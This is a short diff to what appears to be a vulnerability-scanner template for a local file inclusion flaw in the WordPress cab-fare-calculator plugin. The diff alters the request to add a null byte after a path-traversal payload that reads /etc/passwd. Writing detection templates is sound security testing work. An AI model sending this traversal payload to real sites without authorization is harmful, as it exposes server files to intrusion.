--- a/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
+++ b/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml
@@ -12,7 +12,7 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd&action=1&ajax=1'
+      - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1'
 
     matchers-condition: and
     matchers:
